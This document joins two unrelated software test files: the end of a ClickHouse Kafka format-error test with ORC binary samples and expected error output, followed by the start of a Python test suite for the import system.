x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# broken message
b'\x4f\x52\x43\x0a\x0b\x0a\x03\x00\x00\x00\x12\x04\x08\x01\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x29\x0a\x04\x00\x00\x00\x00\x12\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\xff\x80\xff\x80\xff\x00\xff\x80\xff\x03\x42\x41\x44\xff\x80\xff\x02\x41\x4d\xff\x80\x00\x00\x00\x3f\xff\x80\xff\x01\x0a\x06\x08\x06\x10\x00\x18\x0d\x0a\x06\x08\x06\x10\x01\x18\x17\x0a\x06\x08\x06\x10\x02\x18\x14\x0a\x06\x08\x06\x10\x03\x18\x14\x0a\x06\x08\x06\x10\x04\x18\x2b\x0a\x06\x08\x06\x10\x05\x18\x17\x0a\x06\x08\x00\x10\x00\x18\x02\x0a\x06\x08\x00\x10\x01\x18\x02\x0a\x06\x08\x01\x10\x01\x18\x02\x0a\x06\x08\x00\x10\x02\x18\x02\x0a\x06\x08\x02\x10\x02\x18\x02\x0a\x06\x08\x01\x10\x02\x18\x03\x0a\x06\x08\x00\x10\x03\x18\x02\x0a\x06\x08\x02\x10\x03\x18\x02\x0a\x06\x08\x01\x10\x03\x18\x02\x0a\x06\x08\x00\x10\x04\x18\x02\x0a\x06\x08\x01\x10\x04\x18\x04\x0a\x06\x08\x00\x10\x05\x18\x02\x0a\x06\x08\x01\x10\x05\x18\x02\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x1a\x03\x47\x4d\x54\x0a\x59\x0a\x04\x08\x01\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x08\x03\x10\xec\x02\x1a\x0c\x08\x03\x10\x8e\x01\x18\x1d\x20\xc1\x01\x28\x01\x22\x2e\x08\x0c\x12\x05\x01\x02\x03\x04\x05\x1a\x02\x69\x64\x1a\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x1a\x04\x76\x61\x6c\x31\x1a\x04\x76\x61\x6c\x32\x1a\x04\x76\x61\x6c\x33\x20\x00\x28\x00\x30\x00\x22\x08\x08\x04\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x05\x20\x00\x28\x00\x30\x00\x22\x08\x08\x01\x20\x00\x28\x00\x30\x00\x30\x01\x3a\x04\x08\x01\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x3a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x40\x90\x4e\x48\x01\x08\xd5\x01\x10\x00\x18\x80\x80\x04\x22\x02\x00\x0b\x28\x5b\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
],
'expected':r'''{"raw_message":"4F52430A0B0A030000001204080150000A150A050000000000120C0801120608001000180050000A120A06000000000000120808014202080650000A120A06000000000000120808014202080450000A290A0400000000122108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A150A050000000000120C080112060802100218025000FF80FF80FF00FF80FF03424144FF80FF02414DFF800000003FFF80FF010A0608061000180D0A060806100118170A060806100218140A060806100318140A0608061004182B0A060806100518170A060800100018020A060800100118020A060801100118020A060800100218020A060802100218020A060801100218030A060800100318020A060802100318020A060801100318020A060800100418020A060801100418040A060800100518020A060801100518021204080010001204080010001204080010001204080010001204080010001204080010001A03474D540A590A04080150000A0C0801120608001000180050000A0808014202080650000A0808014202080450000A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A0C080112060802100218025000080310EC021A0C0803108E01181D20C1012801222E080C120501020304051A0269641A07626C6F636B4E6F1A0476616C311A0476616C321A0476616C33200028003000220808042000280030002208080820002800300022080808200028003000220808052000280030002208080120002800300030013A04080150003A0C0801120608001000180050003A0808014202080650003A0808014202080450003A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50003A0C08011206080210021802500040904E480108D5011000188080042202000B285B300682F403034F524318","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception."}''',
'printable':False,
}
}
topic_name_prefix = 'format_tests_4_stream_'
for format_name, format_opts in list(all_formats.items()):
print(('Set up {}'.format(format_name)))
topic_name = topic_name_prefix + '{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
raw_message = '_raw_message'
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
if format_opts.get('printable', False) == False:
raw_message = 'hex(_raw_message)'
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = '{format_name}',
kafka_handle_error_mode = 'stream',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_data_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_data_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name}
WHERE length(_error) = 0;
DROP TABLE IF EXISTS test.kafka_errors_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_errors_{format_name}_mv Engine=Log AS
SELECT {raw_message} as raw_message, _error as error, _topic as topic, _partition as partition, _offset as offset FROM test.kafka_{format_name}
WHERE length(_error) > 0;
'''.format(topic_name=topic_name, format_name=format_name, raw_message=raw_message,
extra_settings=format_opts.get('extra_settings') or ''))
for format_name, format_opts in list(all_formats.items()):
print(('Checking {}'.format(format_name)))
topic_name = topic_name_prefix + '{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_data_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
# print(('Checking result\n {result} \n expected \n {expected}\n'.format(result=str(result), expected=str(expected))))
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
errors_result = instance.query('SELECT raw_message, error FROM test.kafka_errors_{format_name}_mv format JSONEachRow'.format(format_name=format_name))
errors_expected = format_opts['expected']
# print(errors_result.strip())
# print(errors_expected.strip())
assert errors_result.strip() == errors_expected.strip(), 'Proper errors for format: {}'.format(format_name)
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
__init__.py
|
# We import importlib *ASAP* in order to test #15386
import importlib
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import builtins
import marshal
import os
import py_compile
import random
import shutil
import subprocess
import stat
import sys
import threading
import time
import unittest
import unittest.mock as mock
import textwrap
import errno
import contextlib
import glob
import test.support
from test.support import (
TESTFN, forget, is_jython,
make_legacy_pyc, rmtree, swap_attr, swap_item, temp_umask,
unlink, unload, cpython_only, TESTFN_UNENCODABLE,
temp_dir, DirsOnSysPath)
from test.support import script_helper
from test.test_importlib.util import uncache
skip_if_dont_write_bytecode = unittest.skipIf(
sys.dont_write_bytecode,
"test meaningful only when writing bytecode")
def remove_files(name):
for f in (name + ".py",
name + ".pyc",
name + ".pyw",
name + "$py.class"):
unlink(f)
rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
# sets up a temporary directory and removes it
# creates the module file
# temporarily clears the module from sys.modules (if any)
# reverts or removes the module when cleaning up
name = name or "spam"
with temp_dir() as tempdir:
path = script_helper.make_script(tempdir, name, source)
old_module = sys.modules.pop(name, None)
try:
sys.path.insert(0, tempdir)
yield name, path
sys.path.remove(tempdir)
finally:
if old_module is not None:
sys.modules[name] = old_module
elif name in sys.modules:
del sys.modules[name]
class ImportTests(unittest.TestCase):
def setUp(self):
remove_files(TESTFN)
importlib.invalidate_caches()
def tearDown(self):
unload(TESTFN)
def test_import_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
import something_that_should_not_exist_anywhere
def test_from_import_missing_module_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
from something_that_should_not_exist_anywhere import blah
def test_from_import_missing_attr_raises_ImportError(self):
with self.assertRaises(ImportError):
from importlib import something_that_should_not_exist_anywhere
def test_from_import_missing_attr_has_name_and_path(self):
with self.assertRaises(ImportError) as cm:
from os import i_dont_exist
self.assertEqual(cm.exception.name, 'os')
self.assertEqual(cm.exception.path, os.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from 'os' \(.*os.py\)")
@cpython_only
def test_from_import_missing_attr_has_name_and_so_path(self):
import _testcapi
with self.assertRaises(ImportError) as cm:
from _testcapi import i_dont_exist
self.assertEqual(cm.exception.name, '_testcapi')
self.assertEqual(cm.exception.path, _testcapi.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from '_testcapi' \(.*\.(so|pyd)\)")
def test_from_import_missing_attr_has_name(self):
with self.assertRaises(ImportError) as cm:
# _warning has no path as it's a built-in module.
from _warning import i_dont_exist
self.assertEqual(cm.exception.name, '_warning')
self.assertIsNone(cm.exception.path)
def test_from_import_missing_attr_path_is_canonical(self):
with self.assertRaises(ImportError) as cm:
from os.path import i_dont_exist
self.assertIn(cm.exception.name, {'posixpath', 'ntpath'})
self.assertIsNotNone(cm.exception)
def test_from_import_star_invalid_type(self):
import re
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("__all__ = [b'invalid_type']")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__all__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("globals()[b'invalid_type'] = object()")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__dict__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
def test_case_sensitivity(self):
# Brief digression to test that import is case-sensitive: if we got
# this far, we know for sure that "random" exists.
with self.assertRaises(ImportError):
import RAnDoM
def test_double_const(self):
# Another brief digression to test the accuracy of manifest float
# constants.
from test import double_const # don't blink -- that *was* the test
def test_import(self):
def test_with_extension(ext):
# The extension is normally ".py", perhaps ".pyw".
source = TESTFN + ext
if is_jython:
pyc = TESTFN + "$py.class"
else:
pyc = TESTFN + ".pyc"
with open(source, "w") as f:
print("# This tests Python's ability to import a",
ext, "file.", file=f)
a = random.randrange(1000)
b = random.randrange(1000)
print("a =", a, file=f)
print("b =", b, file=f)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
importlib.invalidate_caches()
try:
try:
mod = __import__(TESTFN)
except ImportError as err:
self.fail("import from %s failed: %s" % (ext, err))
self.assertEqual(mod.a, a,
"module loaded (%s) but contents invalid" % mod)
self.assertEqual(mod.b, b,
"module loaded (%s) but contents invalid" % mod)
finally:
forget(TESTFN)
unlink(source)
unlink(pyc)
sys.path.insert(0, os.curdir)
try:
test_with_extension(".py")
if sys.platform.startswith("win"):
for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
test_with_extension(ext)
finally:
del sys.path[0]
def test_module_with_large_stack(self, module='longlist'):
# Regression test for http://bugs.python.org/issue561858.
filename = module + '.py'
# Create a file with a list of 65000 elements.
with open(filename, 'w') as f:
f.write('d = [\n')
for i in range(65000):
f.write('"",\n')
f.write(']')
try:
# Compile & remove .py file; we only need .pyc.
# Bytecode must be relocated from the PEP 3147 bytecode-only location.
py_compile.compile(filename)
finally:
unlink(filename)
# Need to be able to load from current dir.
sys.path.append('')
importlib.invalidate_caches()
namespace = {}
try:
make_legacy_pyc(filename)
# This used to crash.
exec('import ' + module, None, namespace)
finally:
# Cleanup.
del sys.path[-1]
unlink(filename + 'c')
unlink(filename + 'o')
# Remove references to the module (unload the module)
namespace.clear()
try:
del sys.modules[module]
except KeyError:
pass
def test_failing_import_sticks(self):
source = TESTFN + ".py"
with open(source, "w") as f:
print("a = 1/0", file=f)
# New in 2.4, we shouldn't be able to import that no matter how often
# we try.
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
if TESTFN in sys.modules:
del sys.modules[TESTFN]
try:
for i in [1, 2, 3]:
self.assertRaises(ZeroDivisionError, __import__, TESTFN)
self.assertNotIn(TESTFN, sys.modules,
"damaged module in sys.modules on %i try" % i)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_import_name_binding(self):
# import x.y.z binds x in the current namespace
import test as x
import test.support
self.assertIs(x, test, x.__name__)
self.assertTrue(hasattr(test.support, "__file__"))
# import x.y.z as w binds z as w
import test.support as y
self.assertIs(y, test.support, y.__name__)
def test_issue31286(self):
# import in a 'finally' block resulted in SystemError
try:
x = ...
finally:
import test.support.script_helper as x
# import in a 'while' loop resulted in stack overflow
i = 0
while i < 10:
import test.support.script_helper as x
i += 1
# import in a 'for' loop resulted in segmentation fault
for i in range(2):
import test.support.script_helper as x
def test_failing_reload(self):
# A failing reload should leave the module object in sys.modules.
source = TESTFN + os.extsep + "py"
with open(source, "w") as f:
f.write("a = 1\nb=2\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertIn(TESTFN, sys.modules)
self.assertEqual(mod.a, 1, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
# On WinXP, just replacing the .py file wasn't enough to
# convince reload() to reparse it. Maybe the timestamp didn't
# move enough. We force it to get reparsed by removing the
# compiled file too.
remove_files(TESTFN)
# Now damage the module.
with open(source, "w") as f:
f.write("a = 10\nb=20//0\n")
self.assertRaises(ZeroDivisionError, importlib.reload, mod)
# But we still expect the module to be in sys.modules.
mod = sys.modules.get(TESTFN)
self.assertIsNotNone(mod, "expected module to be in sys.modules")
# We should have replaced a w/ 10, but the old b value should
# stick.
self.assertEqual(mod.a, 10, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
finally:
del sys.path[0]
remove_files(TESTFN)
unload(TESTFN)
@skip_if_dont_write_bytecode
def test_file_to_source(self):
# check if __file__ points to the source file where available
source = TESTFN + ".py"
with open(source, "w") as f:
f.write("test = None\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertTrue(mod.__file__.endswith('.py'))
os.remove(source)
del sys.modules[TESTFN]
make_legacy_pyc(source)
importlib.invalidate_caches()
mod = __import__(TESTFN)
base, ext = os.path.splitext(mod.__file__)
self.assertEqual(ext, '.pyc')
finally:
del sys.path[0]
remove_files(TESTFN)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
def test_import_by_filename(self):
path = os.path.abspath(TESTFN)
encoding = sys.getfilesystemencoding()
try:
path.encode(encoding)
except UnicodeEncodeError:
self.skipTest('path is not encodable to {}'.format(encoding))
with self.assertRaises(ImportError) as c:
__import__(path)
def test_import_in_del_does_not_crash(self):
# Issue 4236
testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
import sys
class C:
def __del__(self):
import importlib
sys.argv.insert(0, C())
"""))
script_helper.assert_python_ok(testfn)
@skip_if_dont_write_bytecode
def test_timestamp_overflow(self):
# A modification timestamp larger than 2**32 should not be a problem
# when importing a module (issue #11235).
sys.path.insert(0, os.curdir)
try:
source = TESTFN + ".py"
compiled = importlib.util.cache_from_source(source)
with open(source, 'w') as f:
pass
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno not in (getattr(errno, 'EOVERFLOW', None),
getattr(errno, 'EINVAL', None)):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
__import__(TESTFN)
# The pyc file was created.
os.stat(compiled)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_bogus_fromlist(self):
try:
__import__('http', fromlist=['blah'])
except ImportError:
self.fail("fromlist must allow bogus names")
@cpython_only
def test_delete_builtins_import(self):
args = ["-c", "del __builtins__.__import__; import os"]
popen = script_helper.spawn_python(*args)
stdout, stderr = popen.communicate()
self.assertIn(b"ImportError", stdout)
def test_from_import_message_for_nonexistent_module(self):
with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
from bogus import foo
def test_from_import_message_for_existing_module(self):
with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
from re import bogus
def test_from_import_AttributeError(self):
# Issue #24492: trying to import an attribute that raises an
# AttributeError should lead to an ImportError.
class AlwaysAttributeError:
def __getattr__(self, _):
raise AttributeError
module_name = 'test_from_import_AttributeError'
self.addCleanup(unload, module_name)
sys.modules[module_name] = AlwaysAttributeError()
with self.assertRaises(ImportError) as cm:
from test_from_import_AttributeError import does_not_exist
self.assertEqual(str(cm.exception),
"cannot import name 'does_not_exist' from '<unknown module name>' (unknown location)")
@cpython_only
def test_issue31492(self):
# There shouldn't be an assertion failure in case of failing to import
# from a module with a bad __name__ attribute, or in case of failing
# to access an attribute of such a module.
with swap_attr(os, '__name__', None):
with self.assertRaises(ImportError):
from os import does_not_exist
with self.assertRaises(AttributeError):
os.does_not_exist
def test_concurrency(self):
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
try:
exc = None
def run():
event.wait()
try:
import package
except BaseException as e:
nonlocal exc
exc = e
for i in range(10):
event = threading.Event()
threads = [threading.Thread(target=run) for x in range(2)]
try:
with test.support.start_threads(threads, event.set):
time.sleep(0)
finally:
sys.modules.pop('package', None)
sys.modules.pop('package.submodule', None)
if exc is not None:
raise exc
finally:
del sys.path[0]
@unittest.skipUnless(sys.platform == "win32", "Windows-specific")
def test_dll_dependency_import(self):
from _winapi import GetModuleFileName
dllname = GetModuleFileName(sys.dllhandle)
pydname = importlib.util.find_spec("_sqlite3").origin
depname = os.path.join(
os.path.dirname(pydname),
"sqlite3{}.dll".format("_d" if "_d" in pydname else ""))
with test.support.temp_dir() as tmp:
tmp2 = os.path.join(tmp, "DLLs")
os.mkdir(tmp2)
pyexe = os.path.join(tmp, os.path.basename(sys.executable))
shutil.copy(sys.executable, pyexe)
shutil.copy(dllname, tmp)
for f in glob.glob(os.path.join(sys.prefix, "vcruntime*.dll")):
shutil.copy(f, tmp)
shutil.copy(pydname, tmp2)
env = None
env = {k.upper(): os.environ[k] for k in os.environ}
env["PYTHONPATH"] = tmp2 + ";" + os.path.dirname(os.__file__)
# Test 1: import with added DLL directory
subprocess.check_call([
pyexe, "-Sc", ";".join([
"import os",
"p = os.add_dll_directory({!r})".format(
os.path.dirname(depname)),
"import _sqlite3",
"p.close"
])],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
# Test 2: import with DLL adjacent to PYD
shutil.copy(depname, tmp2)
subprocess.check_call([pyexe, "-Sc", "import _sqlite3"],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
# tests for file mode on cached .pyc files
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_creation_mode(self):
mask = 0o022
with temp_umask(mask), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
module = __import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
# Check that the umask is respected, and the executable bits
# aren't set.
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
oct(0o666 & ~mask))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_mode_issue_2051(self):
